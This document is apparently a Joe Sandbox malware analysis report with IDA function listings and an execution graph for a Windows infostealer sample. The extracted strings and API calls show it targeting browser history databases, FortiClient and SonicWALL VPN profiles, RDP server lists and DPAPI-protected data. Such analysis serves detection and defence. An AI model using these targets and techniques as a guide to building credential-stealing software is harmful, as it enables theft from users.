                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                        • String ID: http
                                                                        • API String ID: 948891078-2541227442
                                                                        • Opcode ID: fa2a4001140bfe5c7a6159744d5126d4965f0e2380b7f0228df080dfac48d025
                                                                        • Instruction ID: dceda2d87e78b5c5c51636636522a8b2d78dfa9d2fcf0312379a4c3af8ff27bb
                                                                        • Opcode Fuzzy Hash: fa2a4001140bfe5c7a6159744d5126d4965f0e2380b7f0228df080dfac48d025
                                                                        • Instruction Fuzzy Hash: 7A418532608A929AE710EF79E4447ADB7E0EB8479CF804135FA0D5AA64DF3DD594C390
                                                                        Function 00007FF7CB879478 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81timesynchronizationCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Time$FileProcessSystem$CloseCodeExitHandleNamedObjectPeekPipeSingleTerminateWait
                                                                        • String ID: exit
                                                                        • API String ID: 1626563136-1626635026
                                                                        • Opcode ID: 157560532fddbdd474931b5b94a5a6403812c246ff955327fdeda3b2fbfc7b7d
                                                                        • Instruction ID: 5f90b5292985537a2f98fe2e9fe5aee50d67c52b4e441a2ba8e8b912ef5b1709
                                                                        • Opcode Fuzzy Hash: 157560532fddbdd474931b5b94a5a6403812c246ff955327fdeda3b2fbfc7b7d
                                                                        • Instruction Fuzzy Hash: 79316621A0866291EB50FF39D494179A3E1FF84BA8FD41031F90E965B9DF2CD895C3A0
                                                                        Function 00007FF7CB871EEC Relevance: 12.2, APIs: 8, Instructions: 152commemoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Create$ArrayFileSafe$DataStringTime$AccessAllocCloseExecuteFreeHandleInitInitializeInstancePathShellSystemTempUnaccessVariantVectorWritewsprintf
                                                                        • String ID:
                                                                        • API String ID: 1750269033-0
                                                                        • Opcode ID: 24e8de18f55c2aa4b7ce6dc9423715127756d38879f1172464cba5bf6f043b18
                                                                        • Instruction ID: 4e6c28528e0a336229273ff423f24f8dad45a31ebe4ed53d2cc43d282badf1e3
                                                                        • Opcode Fuzzy Hash: 24e8de18f55c2aa4b7ce6dc9423715127756d38879f1172464cba5bf6f043b18
                                                                        • Instruction Fuzzy Hash: 5D615B36B44A1696EB10EF69D4503AC73A0FB49B9CF848032EE0D57B68DF39D559C3A0
                                                                        Function 00007FF7CB87ECB8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00007FF7CB8725DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CB871985,?,?,?,00007FF7CB87155F), ref: 00007FF7CB8725E5
                                                                        • __memcpy.DELAYIMP ref: 00007FF7CB87ED3F
                                                                          • Part of subcall function 00007FF7CB880110: __memcpy.DELAYIMP ref: 00007FF7CB880141
                                                                          • Part of subcall function 00007FF7CB880110: __memcpy.DELAYIMP ref: 00007FF7CB88014F
                                                                          • Part of subcall function 00007FF7CB87EB90: lstrlenA.KERNEL32 ref: 00007FF7CB87EBAD
                                                                          • Part of subcall function 00007FF7CB8725B4: GetProcessHeap.KERNEL32 ref: 00007FF7CB8725C1
                                                                          • Part of subcall function 00007FF7CB8725B4: HeapFree.KERNEL32 ref: 00007FF7CB8725CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                        • String ID: last_visit_time$table$url$urls
                                                                        • API String ID: 2336645791-3896411411
                                                                        • Opcode ID: 5917827d18d7574bbadcfaa1a2a35274c5974392dd144eb3ec1868595c081487
                                                                        • Instruction ID: 682ab36bfca38d6671ada07cb14a888b5d7637254467ba3f142966790924cfc9
                                                                        • Opcode Fuzzy Hash: 5917827d18d7574bbadcfaa1a2a35274c5974392dd144eb3ec1868595c081487
                                                                        • Instruction Fuzzy Hash: E231A91260869382DA60FF2EE4501AAA3D4FB407E8F804431FE5D57BA5EF3CD4A5C760
                                                                        Function 00007FF7CB87EED8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00007FF7CB8725DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CB871985,?,?,?,00007FF7CB87155F), ref: 00007FF7CB8725E5
                                                                        • __memcpy.DELAYIMP ref: 00007FF7CB87EF5F
                                                                          • Part of subcall function 00007FF7CB880110: __memcpy.DELAYIMP ref: 00007FF7CB880141
                                                                          • Part of subcall function 00007FF7CB880110: __memcpy.DELAYIMP ref: 00007FF7CB88014F
                                                                          • Part of subcall function 00007FF7CB87EB90: lstrlenA.KERNEL32 ref: 00007FF7CB87EBAD
                                                                          • Part of subcall function 00007FF7CB8725B4: GetProcessHeap.KERNEL32 ref: 00007FF7CB8725C1
                                                                          • Part of subcall function 00007FF7CB8725B4: HeapFree.KERNEL32 ref: 00007FF7CB8725CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                        • String ID: last_visit_date$moz_places$table$url
                                                                        • API String ID: 2336645791-66087218
                                                                        • Opcode ID: 4c06316f0353d82960af59c760118a96eaa9d9ac5458cf65fb31cfba7c031be8
                                                                        • Instruction ID: 927ce64d228c71d5eecd2b41a155fb710e234b5e03530a406b498f786d78ede2
                                                                        • Opcode Fuzzy Hash: 4c06316f0353d82960af59c760118a96eaa9d9ac5458cf65fb31cfba7c031be8
                                                                        • Instruction Fuzzy Hash: 4931961260969281DE60EF2FE8505AAA390FF807E8F804032FE4D577A6DF7DD496C760
                                                                        Function 00007FF7CB87F104 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00007FF7CB8725DC: GetProcessHeap.KERNEL32(?,?,?,00007FF7CB871985,?,?,?,00007FF7CB87155F), ref: 00007FF7CB8725E5
                                                                        • __memcpy.DELAYIMP ref: 00007FF7CB87F18B
                                                                          • Part of subcall function 00007FF7CB880110: __memcpy.DELAYIMP ref: 00007FF7CB880141
                                                                          • Part of subcall function 00007FF7CB880110: __memcpy.DELAYIMP ref: 00007FF7CB88014F
                                                                          • Part of subcall function 00007FF7CB87EB90: lstrlenA.KERNEL32 ref: 00007FF7CB87EBAD
                                                                          • Part of subcall function 00007FF7CB8725B4: GetProcessHeap.KERNEL32 ref: 00007FF7CB8725C1
                                                                          • Part of subcall function 00007FF7CB8725B4: HeapFree.KERNEL32 ref: 00007FF7CB8725CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Heap__memcpy$Process$Freelstrlen
                                                                        • String ID: last_visit_time$table$url$urls
                                                                        • API String ID: 2336645791-3896411411
                                                                        • Opcode ID: 0a42863f281ee6fe74cbd49d57002a5e8e3fc762b2f6cce6b126dc49bb499105
                                                                        • Instruction ID: a4a2f5e6393022144271974f7919036adccfdda2935741f2df874d21b7dc8085
                                                                        • Opcode Fuzzy Hash: 0a42863f281ee6fe74cbd49d57002a5e8e3fc762b2f6cce6b126dc49bb499105
                                                                        • Instruction Fuzzy Hash: 4831961161869381DE60EF2EE4505AAB390FB81BE8F804031FE4D57BA5DF3CD495D7A0
                                                                        Function 00007FF7CB87E3A8 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: AppendPathlstrcpy
                                                                        • String ID: ":"$"},$Software\Fortinet\FortiClient\Sslvpn\Tunnels
                                                                        • API String ID: 3043196718-4231764533
                                                                        • Opcode ID: aa9ff1c84d4b7c8f3090ffa5ee34b20535206f5e98df821a65f4a5b75f9be73c
                                                                        • Instruction ID: bad5cda7cbde20cca8a6335c2f529e239cf7f14d506a6586de7671f8fcdca9c4
                                                                        • Opcode Fuzzy Hash: aa9ff1c84d4b7c8f3090ffa5ee34b20535206f5e98df821a65f4a5b75f9be73c
                                                                        • Instruction Fuzzy Hash: 6E31D172618B9182DA20FF29E4042E9A3A5FB88BE4F940132FE5C177A9CF3CD554C790
                                                                        Function 00007FF7CB871DE8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCreateValue
                                                                        • String ID: ?
                                                                        • API String ID: 1818849710-1684325040
                                                                        • Opcode ID: 3f699420e7c2bd9d5165ef801724a0e58f217ece520d4ca7f8f7086c4c226540
                                                                        • Instruction ID: a9ce25c87b3907caaa76ff3725ffe2035ae7756442d93e95b0b5941bc8ce6f3c
                                                                        • Opcode Fuzzy Hash: 3f699420e7c2bd9d5165ef801724a0e58f217ece520d4ca7f8f7086c4c226540
                                                                        • Instruction Fuzzy Hash: 4721A173A147908AE720AF75A8402EDBBE0FB5C7A8B940225EA8C07F59CF38C154CB50
                                                                        Function 00007FF7CB87E600 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: HeapValue$AppendFreePathProcesslstrcpy
                                                                        • String ID: "},$Software\SonicWALL\SSL-VPN NetExtender\Standalone\Profiles
                                                                        • API String ID: 784796242-1893226844
                                                                        • Opcode ID: 142641f8b7a49738de1f75f81717160bc999a6765c17e45e63aeae2f78436569
                                                                        • Instruction ID: 3f6f8923c7679da9ab11d587367f3a4b9d1bd4a16d94c6088a341c8522bbf0cf
                                                                        • Opcode Fuzzy Hash: 142641f8b7a49738de1f75f81717160bc999a6765c17e45e63aeae2f78436569
                                                                        • Instruction Fuzzy Hash: 5D11B11160869240D920FF19E8553FAD390EF84BE4FC05131F95D5B6BADF2CD195C7A0
                                                                        Function 00007FF7CB87CBF0 Relevance: 6.1, APIs: 4, Instructions: 61registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Enum$CloseOpen
                                                                        • String ID:
                                                                        • API String ID: 1701607978-0
                                                                        • Opcode ID: 416c5c68e5041cda3919146f9132f3cad043645ab3bbea6a523ac74fa5a0f50e
                                                                        • Instruction ID: 2f8a7e447a61a5b819cab927f00ec75e51b0fdc87f4d6e0949ed0fac324310c1
                                                                        • Opcode Fuzzy Hash: 416c5c68e5041cda3919146f9132f3cad043645ab3bbea6a523ac74fa5a0f50e
                                                                        • Instruction Fuzzy Hash: 34216B33618B8582D3109F15E48476AB7B4F788B94F550236EB8C43B28CF3DD559CB40
                                                                        Function 00007FF7CB87E4D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: Value$AppendPathlstrcpy
                                                                        • String ID: Software\Microsoft\Terminal Server Client\Servers
                                                                        • API String ID: 19203174-1233151749
                                                                        • Opcode ID: 37b6a1f4aac90ea7ac1389f132fae6e750dfaedc5a30334d59bc4a8f412dfbf4
                                                                        • Instruction ID: b38f3e56aff97931a10622350fdb92f9b5b6e1cda6dcf9b8f64d6cadf141d9c1
                                                                        • Opcode Fuzzy Hash: 37b6a1f4aac90ea7ac1389f132fae6e750dfaedc5a30334d59bc4a8f412dfbf4
                                                                        • Instruction Fuzzy Hash: D121F16261468285DB20FF25D8102EDA390FB88BE8FC44132FA4D1BBAADF3CD255C750
                                                                        Function 00007FF7CB87FDDC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetEnvironmentVariableW.KERNEL32 ref: 00007FF7CB87FE0D
                                                                        • lstrcatW.KERNEL32 ref: 00007FF7CB87FE1A
                                                                          • Part of subcall function 00007FF7CB87FF38: lstrlenW.KERNEL32 ref: 00007FF7CB87FF5E
                                                                          • Part of subcall function 00007FF7CB87FF38: lstrlenW.KERNEL32 ref: 00007FF7CB87FF7A
                                                                          • Part of subcall function 00007FF7CB87FF38: WideCharToMultiByte.KERNEL32 ref: 00007FF7CB87FFA3
                                                                          • Part of subcall function 00007FF7CB87FF38: PathFileExistsA.SHLWAPI ref: 00007FF7CB87FFAC
                                                                          • Part of subcall function 00007FF7CB87FF38: OpenFile.KERNEL32 ref: 00007FF7CB87FFC5
                                                                          • Part of subcall function 00007FF7CB87FF38: GetFileSize.KERNEL32 ref: 00007FF7CB87FFE5
                                                                          • Part of subcall function 00007FF7CB87FF38: CreateFileMappingA.KERNEL32 ref: 00007FF7CB88001C
                                                                          • Part of subcall function 00007FF7CB87FF38: MapViewOfFile.KERNEL32 ref: 00007FF7CB88003D
                                                                          • Part of subcall function 00007FF7CB87FF38: __memcpy.DELAYIMP ref: 00007FF7CB88004F
                                                                          • Part of subcall function 00007FF7CB87FF38: UnmapViewOfFile.KERNEL32 ref: 00007FF7CB88005A
                                                                          • Part of subcall function 00007FF7CB87FF38: CloseHandle.KERNEL32 ref: 00007FF7CB880063
                                                                          • Part of subcall function 00007FF7CB87FF38: CloseHandle.KERNEL32 ref: 00007FF7CB88006C
                                                                          • Part of subcall function 00007FF7CB87F27C: __memcpy.DELAYIMP ref: 00007FF7CB87F29A
                                                                          • Part of subcall function 00007FF7CB8725B4: GetProcessHeap.KERNEL32 ref: 00007FF7CB8725C1
                                                                          • Part of subcall function 00007FF7CB8725B4: HeapFree.KERNEL32 ref: 00007FF7CB8725CF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.4537706234.00007FF7CB871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CB870000, based on PE: true
                                                                        • Associated: 00000008.00000002.4537651105.00007FF7CB870000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537750976.00007FF7CB881000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537787827.00007FF7CB884000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                        • Associated: 00000008.00000002.4537827092.00007FF7CB885000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_7ff7cb870000_B575.jbxd
                                                                        Similarity
                                                                        • API ID: File$CloseHandleHeapView__memcpylstrlen$ByteCharCreateEnvironmentExistsFreeMappingMultiOpenPathProcessSizeUnmapVariableWidelstrcat
                                                                        • String ID: APPDATA
                                                                        • API String ID: 2395011915-4054820676
                                                                        • Opcode ID: 1c5aadbc771fdada102cf90f1d560a23c7010e43b89a1500ae84cb532174cc29
                                                                        • Instruction ID: 09546396ee01c6bcbd6b8aa3b81fd36aceca6f356a81ca2b093cce8f3206d3d7
                                                                        • Opcode Fuzzy Hash: 1c5aadbc771fdada102cf90f1d560a23c7010e43b89a1500ae84cb532174cc29
                                                                        • Instruction Fuzzy Hash: 95117F22628A9291EF10EF15E4405EDB3A1FB88798FC45031FA4D97A69EF3CD558C790

                                                                        Execution Graph

                                                                        Execution Coverage:3.6%
                                                                        Dynamic/Decrypted Code Coverage:50.1%
                                                                        Signature Coverage:3.2%
                                                                        Total number of Nodes:784
                                                                        Total number of Limit Nodes:85
                                                                        execution_graph 28497 3280128 36 API calls 28500 3279925 18 API calls 28392 32a072d 19 API calls 28393 32bc322 27 API calls 28394 327cb2a _allmul _allmul 28397 3287b3d 18 API calls 28399 3280f3e 60 API calls 28502 329f130 22 API calls 28400 328ff32 21 API calls 28503 3289534 39 API calls 28401 3295f08 102 API calls 28025 32d9304 28026 32d9344 28025->28026 28027 32d94da LoadLibraryA 28026->28027 28031 32d951f VirtualProtect VirtualProtect 28026->28031 28032 32d9584 28026->28032 28028 32d94f1 28027->28028 28028->28026 28030 32d9503 GetProcAddress 28028->28030 28030->28028 28033 32d9519 28030->28033 28031->28032 28032->28032 28404 32a6f06 24 API calls 28056 3274108 28057 3274045 50 API calls 28056->28057 28058 3274118 28057->28058 28059 3273717 28060 3271b6a 2 API calls 28059->28060 28062 327372e 28060->28062 28061 3273c23 28062->28061 28109 3271000 GetProcessHeap RtlAllocateHeap 28062->28109 28064 327376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 28065 327379e 28064->28065 28066 32737a8 28064->28066 28110 327349b 31 API calls 28065->28110 28067 32c4bec 89 API calls 28066->28067 28071 32737b3 28067->28071 28069 3273c15 DeleteFileW 28070 3271011 3 API calls 28069->28070 28070->28061 28071->28069 28072 3273c0c 28071->28072 28111 3271000 GetProcessHeap RtlAllocateHeap 28071->28111 28073 32c3848 76 API calls 28072->28073 28073->28069 28075 32737e3 28112 32902ec 94 API calls 28075->28112 28078 3273bd9 lstrlen 28079 3273c05 28078->28079 28080 3273be5 28078->28080 28081 3271011 3 API calls 28079->28081 28118 3271798 lstrlen 28080->28118 28081->28072 28083 3273a37 CryptUnprotectData 28101 32737ee 28083->28101 28084 3273833 RtlCompareMemory 28084->28083 28084->28101 28086 3273bf3 28119 3271798 lstrlen 28086->28119 28088 3273bcc 28117 328fb92 93 API calls 28088->28117 28089 3273bfc 28120 3271798 lstrlen 28089->28120 28091 3271fa7 19 API calls 28091->28101 28092 3273867 RtlZeroMemory 28113 3271000 GetProcessHeap RtlAllocateHeap 28092->28113 28094 3271011 3 API calls 28094->28101 28095 3273b0f lstrlen 28096 3273b21 lstrlen 28095->28096 28095->28101 28096->28101 28097 3273987 lstrlen 28100 3273999 lstrlen 28097->28100 28097->28101 28099 3273b66 wsprintfA lstrlen 28099->28101 28102 3273ba3 lstrcat 28099->28102 28100->28101 28101->28083 28101->28084 28101->28088 28101->28091 28101->28092 28101->28094 28101->28095 28101->28097 28101->28102 28103 3271000 GetProcessHeap RtlAllocateHeap 28101->28103 28114 3272112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28101->28114 28115 3272112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 28101->28115 28116 32902ec 94 API calls 28101->28116 28102->28101 28103->28101 28105 32739de wsprintfA lstrlen 28106 3273a0d 28105->28106 28107 3273a1b lstrcat 28105->28107 28106->28107 28108 3271011 3 API calls 28107->28108 28108->28101 28109->28064 28110->28066 28111->28075 28112->28101 28113->28101 28114->28105 28115->28099 28116->28101 28117->28078 28118->28086 28119->28089 28120->28079 28121 3272b15 28122 3271953 6 API calls 28121->28122 28123 3272b1f FindFirstFileW 28122->28123 28125 3272c5c 28123->28125 28144 3272b4e 28123->28144 28126 3271011 3 API calls 28125->28126 28127 3272c63 28126->28127 28129 3271011 3 API calls 28127->28129 28128 3272b59 lstrcmpiW 28131 3272b71 lstrcmpiW 28128->28131 28132 3272c3d FindNextFileW 28128->28132 28133 3272c6a 28129->28133 28130 3271953 6 API calls 28130->28144 28131->28132 28131->28144 28134 3272c51 FindClose 28132->28134 28132->28144 28134->28125 28135 327199d 9 API calls 28137 3272bdf StrStrIW 28135->28137 28136 32719b4 lstrlenW 28136->28144 28138 3272c10 StrStrIW 28137->28138 28141 3272bf1 28137->28141 28138->28141 28139 3271cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 28139->28141 28140 3271011 3 API calls 28140->28132 28141->28138 28141->28139 28141->28140 28146 327278e 41 API calls 28141->28146 28143 327199d 9 API calls 28143->28144 28144->28128 28144->28130 28144->28135 28144->28136 28144->28143 28145 3271011 3 API calls 28144->28145 28145->28144 28146->28138 28505 32884a7 30 API calls 28337 327411b 28338 3274045 50 API calls 28337->28338 28339 327412b 28338->28339 28340 3274045 50 API calls 28339->28340 28341 327413b 28340->28341 28407 3296b14 memset memcpy _allmul 27536 3274164 27539 3274045 27536->27539 27558 3273fdc 27539->27558 27542 3273fdc 50 API calls 27543 327407a 27542->27543 27544 3273fdc 50 API calls 27543->27544 27545 327408d 27544->27545 27546 3273fdc 50 API calls 27545->27546 27547 32740a0 27546->27547 27548 3273fdc 50 API calls 27547->27548 27549 32740b3 27548->27549 27550 3273fdc 50 API calls 27549->27550 27551 32740c6 27550->27551 27552 3273fdc 50 API calls 27551->27552 27553 32740d9 27552->27553 27554 3273fdc 50 API calls 27553->27554 27555 32740ec 27554->27555 27556 3273fdc 50 API calls 27555->27556 27557 32740ff 27556->27557 27569 3271afe 27558->27569 27561 327403f 27561->27542 27566 3274038 27632 3271011 27566->27632 27637 3271000 GetProcessHeap RtlAllocateHeap 27569->27637 27571 3271b0d SHGetFolderPathW 27572 3271b20 27571->27572 27575 3271b63 27571->27575 27573 3271011 3 API calls 27572->27573 27576 3271b28 27573->27576 27575->27561 27577 327199d 27575->27577 27576->27575 27638 32719e5 27576->27638 27653 3271953 27577->27653 27579 32719a6 27580 3271011 3 API calls 27579->27580 27581 32719af 27580->27581 27582 3273ed9 27581->27582 27583 3273fd1 27582->27583 27584 3273eed 27582->27584 27583->27566 27604 3271d4a 27583->27604 27584->27583 27659 3271000 GetProcessHeap RtlAllocateHeap 27584->27659 27586 3273f01 PathCombineW FindFirstFileW 27587 3273fca 27586->27587 27593 3273f27 27586->27593 27590 3271011 3 API calls 27587->27590 27588 3273f32 lstrcmpiW 27591 3273f42 lstrcmpiW 27588->27591 27592 3273faf FindNextFileW 27588->27592 27589 3273f78 lstrcmpiW 27589->27592 27589->27593 27590->27583 27591->27592 27595 3273f56 27591->27595 27592->27593 27594 3273fc3 FindClose 27592->27594 27593->27588 27593->27589 27660 3271000 GetProcessHeap RtlAllocateHeap 27593->27660 27594->27587 27677 3271000 GetProcessHeap RtlAllocateHeap 27595->27677 27598 3273f92 PathCombineW 27661 3273e04 27598->27661 27599 3273f60 PathCombineW 27601 3273ed9 23 API calls 27599->27601 27602 3273f76 27601->27602 